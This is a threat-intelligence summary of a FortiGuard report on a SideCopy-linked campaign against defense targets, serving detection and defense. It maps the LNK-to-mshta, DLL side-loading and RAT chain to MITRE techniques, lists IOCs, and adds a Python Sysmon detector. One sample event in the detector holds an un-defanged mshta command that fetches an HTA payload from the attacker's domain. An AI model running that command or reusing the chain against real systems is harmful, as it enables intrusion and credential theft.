Clean Rooms, Nuclear Missiles, and SideCopy, Oh My! | FortiGuard Labs

Fortinet researchers detail a SideCopy-linked operation that uses decoys and HTA-based payloads to deploy a multi-stage Windows malware chain aimed at defense-sector targets. The campaign blends phishing, decoy documents, living-off-the-land execution through mshta.exe, DLL side-loading, in-memory execution, and C2 communications to control the victim and harvest credentials. #SideCopy #PantomimeHTA #SILENTTRINITY #DRDO #K4Missile #TransparentTribe

Keypoints

  • The initial infection vector is suspected to be a phishing e-mail, with a ZIP named “DRDO-K4-Missile-Clean-room.zip” involved.
  • The ZIP contains decoys and a malicious LNK file (“DRDO-K4 Missile Clean room.pptx.lnk”) designed to resemble a PPTX to lure victims.
  • The LNK uses mshta.exe to reach out to a remote domain and download a payload (Pantomime.hta).
  • The campaign leverages SILENTTRINITY to generate payloads and execute .NET code without PowerShell as an intermediate step.
  • Encoded and obfuscated payloads are decoded and loaded in memory (e.g., “hta.dll” deserializes and runs “PreBot.dll”).
  • Dropper and RAT stages deploy via DLL side-loading (DUser.dll loaded by cridviz.exe) and culminate in a Windows RAT that communicates with C2 infrastructure.
  • The RAT uses a distinctive user-agent and HTTP/TCP channels for C2, and includes credential access via Windows Credential Manager (credwiz) and WMI-based antivirus discovery.

MITRE Techniques

  • [T1566.001] Phishing: Spearphishing Attachment – The initial infection vector is suspected to be a phishing e-mail. ‘The initial infection vector is suspected to be a phishing e-mail.’
  • [T1036] Masquerading – The Windows shortcut file DRDO-K4 Missile Clean room.pptx.lnk masquerades as a PPTX; ‘The Windows shortcut file does not open a PowerPoint file (at least immediately)…’
  • [T1218.005] Mshta – The LNK uses mshta.exe to reach out to a domain controlled by the attacker and download Pantomime.hta. ‘…reach out to a domain controlled by the attacker using the utility for Microsoft HTML Applications (HTAs), or “mshta.exe”.’
  • [T1574.002] DLL Side-Loading – DUser.dll is dropped in the same directory as cridviz.exe to be loaded by it and executed. ‘sideloading to load its code into memory via dropping the malicious DLL “DUser.dll” in the directory with “cridviz.exe”.’
  • [T1055] Process Injection / In-Memory Execution – The newly decoded payloads are deserialized and executed in memory (e.g., ‘punctureTyres’ decoded and deserialized to run ‘PreBot.dll’).
  • [T1555.003] Credentials in Windows Credential Manager – The RAT utilizes the Windows Credential Manager via “Credential Backup and Restore Wizard” to access credentials. ‘The Windows Credential Manager to provide a method for backing up and restoring saved credentials on the system.’
  • [T1047] Windows Management Instrumentation – The decoded base64 block queries antivirus information via WMI (e.g., ‘Select * From AntiVirusProduct’).
  • [T1105] Ingress Tool Transfer – The payload is downloaded from remote servers (e.g., jquery.txt and jquery.hta). ‘getThirdStrike… to download file jquery.hta from cornerstonebeverly.org/js/files/ntfonts/jquery.txt’.
  • [T1071.001] Web Protocols – The RAT communicates using HTTP and TCP with a distinct user-agent. ‘The RAT can communicate over TCP using raw sockets or via HTTP.’
  • [T1041] Exfiltration Over C2 Channel – Antivirus status and other data is posted to C2 endpoints. ‘via HTTP POST through the “pkg.infinity” function, which will reach out to cornerstonebeverly.org/js/files/ntfonts/avena/’.
  • [T1574.002] DLL Side-Loading – Additional dependencies are loaded by cridviz.exe through dropping DUser.dll in its directory, enabling the RAT to load in memory. ‘sideloading to load its code into memory… by dropping the malicious DLL “DUser.dll” in the directory with “cridviz.exe”.’
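
As an added defender-side example (not code from the Fortinet report), the two host-level signatures the technique list above implies, mshta.exe launching an HTA from a URL (T1218.005) and DUser.dll resolved from outside the system directories (T1574.002), run over constructed Sysmon-style events. The side-loading rule is generalized to any host process rather than only cridviz.exe; the event field names, sample paths and severities are assumptions.

```python
import ntpath
import re

# Constructed Sysmon-style events (EventID 1 = process create, 7 = image load); written for this example, not report data.
SAMPLE_EVENTS = [
    {"EventID": 1, "Image": r"C:\Windows\System32\mshta.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "mshta.exe http://cornerstonebeverly.org/js/files/docufentososo/doecumentosoneso/pantomime.hta"},
    {"EventID": 1, "Image": r"C:\Windows\System32\mshta.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"mshta.exe C:\Program Files\Vendor\setup.hta"},  # local HTA, lower severity
    {"EventID": 7, "Image": r"C:\Users\victim\AppData\Local\Temp\cridviz.exe",
     "ImageLoaded": r"C:\Users\victim\AppData\Local\Temp\DUser.dll"},
    {"EventID": 7, "Image": r"C:\Windows\System32\credwiz.exe",
     "ImageLoaded": r"C:\Windows\System32\duser.dll"},  # legitimate load, must not alert
]

REMOTE_URL = re.compile(r"https?://", re.IGNORECASE)
SYSTEM_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\")

def _base(path):
    return ntpath.basename(path).lower()

def check_mshta(ev):
    """T1218.005: mshta.exe given an HTA; worst when it is a URL and the parent is explorer.exe (a double-clicked LNK)."""
    if ev.get("EventID") != 1 or _base(ev.get("Image", "")) != "mshta.exe":
        return None
    cmd = ev.get("CommandLine", "")
    if REMOTE_URL.search(cmd):
        sev = "high" if _base(ev.get("ParentImage", "")) == "explorer.exe" else "medium"
        return ("T1218.005", sev, "mshta.exe fetching a remote HTA")
    if ".hta" in cmd.lower():
        return ("T1218.005", "low", "mshta.exe running a local HTA")
    return None

def check_duser_sideload(ev):
    """T1574.002: DUser.dll resolved from a non-system directory, i.e. a copy dropped beside the host binary."""
    if ev.get("EventID") != 7 or _base(ev.get("ImageLoaded", "")) != "duser.dll":
        return None
    if ev["ImageLoaded"].lower().startswith(SYSTEM_DIRS):
        return None
    return ("T1574.002", "high",
            f"{_base(ev['Image'])} loaded DUser.dll from {ntpath.dirname(ev['ImageLoaded'])}")

def scan(events):
    """Run every rule over every event and return the alerts raised, in event order."""
    return [hit for ev in events for rule in (check_mshta, check_duser_sideload)
            if (hit := rule(ev))]
```

Feeding real Sysmon exports requires only mapping the exporter's field names onto the keys used in SAMPLE_EVENTS.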

Indicators of Compromise

  • [File] DRDO-K4-Missile-Clean-room.zip (SHA256: 9aed0c5a047959ef38ec0555ccb647688c67557a6f8f60f691ab0ec096833cce), pantomime.hta (SHA256: e88835e21c431d00a9b465d2e8bed746b6369892e33be10bc7ebbda6e8185819)
  • [File] DRDO-K4 Missile Clean room.pptx.lnk (SHA256: a2e55cbd385971904abf619404be7ee8078ce9e3e46226d4d86d96ff31f6bb9a), jquery.hta (SHA256: 85faf414ed0ba9c58b9e7d4dc7388ba5597598c93b701d367d8382717fb485ec)
  • [Domain] cornerstonebeverly.org – HTA file downloads / C2 endpoints
  • [URL] hXXp://cornerstonebeverly.org/js/files/docufentososo/doecumentosoneso/pantomime.hta – Payload download
  • [URL] hXXps://cornerstonebeverly.org/js/files/ntfonts/avena/ – C2
  • [URL] hXXp://cornerstonebeverly.org/js/files/ntfonts/jquery.txt – Additional payload download
  • [IP] 144.91.72.17:8080 – C2 server for DUser.dll
  • [URL] 144.91.72.17:8080/user_details – C2-related data capture

Read more: https://www.fortinet.com/blog/threat-research/clean-rooms-nuclear-missiles-and-sidecopy